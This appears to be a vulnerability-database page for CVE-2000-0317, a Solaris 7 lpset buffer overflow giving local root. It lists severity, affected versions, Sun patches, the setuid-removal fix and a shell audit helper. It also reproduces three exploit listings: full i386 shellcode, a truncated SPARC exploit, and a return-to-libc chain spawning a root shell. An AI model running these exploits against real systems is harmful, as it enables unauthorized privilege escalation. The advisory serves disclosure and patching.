CVE-2000-0317
CVSS 7.2
Published: 2000-04-24 00:00:00
Last modified: 2016-10-17 22:06:47

[Original] Buffer overflow in Solaris 7 lpset allows local users to gain root privileges via a long -r option.


[CNNVD] Solaris lpset -r buffer overflow vulnerability (CNNVD-200004-068)

Solaris 7 lpset contains a buffer overflow; a local user can gain root privileges by supplying an overly long -r option.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.6

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0317
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0317
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-068
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2000-04/0192.html
(VENDOR_ADVISORY)  BUGTRAQ  20000424 Solaris 7 x86 lpset exploit.
http://archives.neohapsis.com/archives/bugtraq/2000-04/0236.html
(VENDOR_ADVISORY)  BUGTRAQ  20000424 Solaris 7 x86 lpset exploit.
http://marc.info/?l=bugtraq&m=95729763119559&w=2
(UNKNOWN)  BUGTRAQ  20000427 Re: Solaris/SPARC 2.7 lpset exploit (well not likely !)
http://www.securityfocus.com/bid/1138
(VENDOR_ADVISORY)  BID  1138

- Vulnerability information

Solaris lpset -r buffer overflow vulnerability
High severity  Buffer overflow
2000-04-24 00:00:00 2005-10-20 00:00:00
Local
Solaris 7 lpset contains a buffer overflow; a local user can gain root privileges by supplying an overly long -r option.

- Advisories and patches

Sun has made the following patches available from
http://sunsolve.sun.com/securitypatch:
SunOS 5.8 109320-01
SunOS 5.8_x86 109321-01
SunOS 5.7 107115-05
SunOS 5.7_x86 107115-05
SunOS 5.6 106235-06
SunOS 5.6_x86 106236-06
Checksums are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS
Removal of the setuid bit on the lpset executable will remove this problem. As this program is intended to only be runnable by root and by members of the 'sysadmin' group (group 14), removal of this bit should not have a significant impact.

- Vulnerability information (19872)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1) (EDBID:19872)
solaris local
2000-04-24 Verified
0 DiGiT
N/A
source: http://www.securityfocus.com/bid/1138/info

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

/*
 *
 * solaris 2.7 lpset local exploit, i386.
 * discovered by: duke
 * not the same as on bt.
 * if exploit doesn't work try offset from 300-450
 *
 * greets: duke, #!ADM, #!security.is, #hax
 *
 * DiGiT - teddi@linux.is
 *
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

/* i386-specific: leaves %esp in %eax, the return register */
long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[]) {

    long offset = 410;   /* distance from the current %esp to the guessed return address */
    int nop = 64;        /* index at which the NOP sled ends */
    int gab = 40;        /* padding bytes before the overwritten return address */
    long addr;
    char buffer[210];
    int i, a, b;

    if (argc > 1) offset = strtol(argv[1], NULL, 0);
    if (argc > 2) gab = strtol(argv[2], NULL, 0);
    if (argc > 3) nop = strtol(argv[3], NULL, 0);   /* the posted code read argv[2] here */

    for (a = 0; a < gab; a++)
        buffer[a] = 'A';

    addr = get_esp() + offset;

    /* return address, little-endian */
    buffer[a++] = addr & 0x000000ff;
    buffer[a++] = (addr & 0x0000ff00) >> 8;
    buffer[a++] = (addr & 0x00ff0000) >> 16;
    buffer[a++] = (addr & 0xff000000) >> 24;

    for ( ; a < nop; a++)
        buffer[a] = 0x90;

    for (b = 0; b < strlen(shellcode); b++, a++)
        buffer[a] = shellcode[b];

    buffer[a] = '\0';   /* the posted code called strlen() on the not yet terminated buffer */

    printf("addr = 0x%lx\n", addr);
    execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer, "digit", NULL);
    return 0;
}

- Vulnerability information (19873)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (2) (EDBID:19873)
solaris local
2000-04-24 Verified
0 Theodor Ragnar Gislason
N/A
source: http://www.securityfocus.com/bid/1138/info
 
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>      /* malloc, atoi, exit */
#include <sys/types.h>   /* u_long */

#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200

#define NOP 0xac15a16e

#define EXSTART 116

char sparc_shellcode[] =

/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"

/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

/* SPARC-specific: returns the current stack pointer through %i0 */
u_long get_sp() { asm("mov %sp, %i0"); }

int main(int argc, char *argv[]) {
        int i,ofs=OFFSET,start=START,end=END;
        u_long ret, *ulp;
        char *buf;

        if (argc > 1) ofs=atoi(argv[1])+8;

        if (!(buf = (char *) malloc(BSIZE+2))) {
                fprintf(stderr, "out of memory\n");
                exit(1);
        }

        ret = get_sp() - ofs;

        /* fill the whole buffer with the NOP-equivalent word */
        for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++)
                *ulp = NOP;

        /* overwrite the window [start, end) with the guessed return address */
        for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret;

        for (
        /* the listing is truncated at this point in the source page */

- Vulnerability information (19874)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (3) (EDBID:19874)
solaris local
2000-04-24 Verified
0 Theodor Ragnar Gislason
N/A
source: http://www.securityfocus.com/bid/1138/info
  
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

#include <string.h>   /* memset */
#include <unistd.h>   /* execle */

/* function and string addresses are expressed as a library base plus offset */
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36

#define SYSTEM (BASE + 0x5b328)
#define SCANF  (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD  (BASE + 0x83754)
#define BINSH  (BASE + 0x83654)
#define POP3   (SYSTEM + 610)
#define POP2   (SYSTEM + 611)
#define POP1   (SYSTEM + 612)

int
main()
{
    unsigned char expbuf[1024];
    char *env[1];
    int *p, i;

    /* BUFSIZE bytes of padding, then the sequence of addresses written as 32-bit words */
    memset(expbuf, 'a', BUFSIZE);
    p = (int *)(expbuf + BUFSIZE);

    *p++ = STACK;
    *p++ = SCANF + 1;
    *p++ = STACK + 6 * 4;
    *p++ = POP2;
    *p++ = PERCD;
    *p++ = STACK + 9 * 4;

    *p++ = STACK + 10 * 4;
    *p++ = SETUID;
    *p++ = POP1;
    *p++ = 0x33333333;
    *p++ = STACK + 15 * 4;

    *p++ = SYSTEM;
    *p++ = 0x33333333;
    *p++ = BINSH;
    *p = 0;

    env[0] = 0;   /* run the target with an empty environment */
    execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
           env);
    return 0;
}

- Vulnerability information

7157
Solaris 7 lpset -r Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-04-24 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Solaris lpset -r Buffer Overflow Vulnerability
Boundary Condition Error 1138
No Yes
2000-04-24 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list on April 24, 2000 by Theodor Ragnar Gislason <teddi@linux.is>

- Affected program versions

Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6

- Vulnerability discussion

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

- Exploit

exploit available

- Solution

Sun has made the following patches available from http://sunsolve.sun.com/securitypatch:

SunOS 5.8 109320-01
SunOS 5.8_x86 109321-01
SunOS 5.7 107115-05
SunOS 5.7_x86 107115-05
SunOS 5.6 106235-06
SunOS 5.6_x86 106236-06

Checksums are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS

Removal of the setuid bit on the lpset executable will remove this problem. As this program is intended to only be runnable by root and by members of the 'sysadmin' group (group 14), removal of this bit should not have a significant impact.
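The two remediations above (the Sun patch level and the setuid bit on lpset) can be audited from a shell. The helper below is an added example, not part of the advisory or of Sun's tooling: it takes "showrev -p" style output on stdin, assumes lines of the form "Patch: 107115-05 Obsoletes: ... Packages: ...", and uses the patch IDs quoted in the advisory; the release keys (5.7, 5.7_x86, ...) are names chosen here.

```shell
# Added audit helper for CVE-2000-0317 remediation (not Sun's code).
# Sun patch revisions are cumulative, so 107115-06 satisfies a 107115-05 requirement.

required_patch() {            # release key -> required patch ID (from the advisory)
    case "$1" in
        5.8)         echo 109320-01 ;;
        5.8_x86)     echo 109321-01 ;;
        5.7|5.7_x86) echo 107115-05 ;;
        5.6)         echo 106235-06 ;;
        5.6_x86)     echo 106236-06 ;;
        *)           return 1 ;;
    esac
}

patch_installed() {           # $1 = required ID, stdin = "showrev -p" lines (assumed format)
    req_base=${1%-*}; req_rev=${1#*-}
    awk -v base="$req_base" -v rev="$req_rev" '
        $1 == "Patch:" { split($2, p, "-")
                         if (p[1] == base && p[2] + 0 >= rev + 0) found = 1 }
        END { if (found) exit 0; exit 1 }'
}

lpset_is_setuid() {           # $1 = path; 0 = setuid bit set, 1 = clear, 2 = file missing
    [ -e "$1" ] || return 2
    case "$(ls -ld "$1" | cut -c4)" in   # owner-execute slot of the mode string
        s|S) return 0 ;;
        *)   return 1 ;;
    esac
}

audit_lpset() {               # $1 = release key, $2 = lpset path, stdin = "showrev -p" output
    req=$(required_patch "$1") || { echo "unknown release: $1"; return 2; }
    if patch_installed "$req"; then
        echo "patched: $req or later is installed"; return 0
    fi
    if lpset_is_setuid "$2"; then
        echo "VULNERABLE: $req is missing and $2 is still setuid"; return 1
    fi
    echo "unpatched but mitigated: $2 is not setuid"; return 0
}

# Typical use on the host itself:  showrev -p | audit_lpset 5.7 /usr/bin/lpset
```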

- Related references
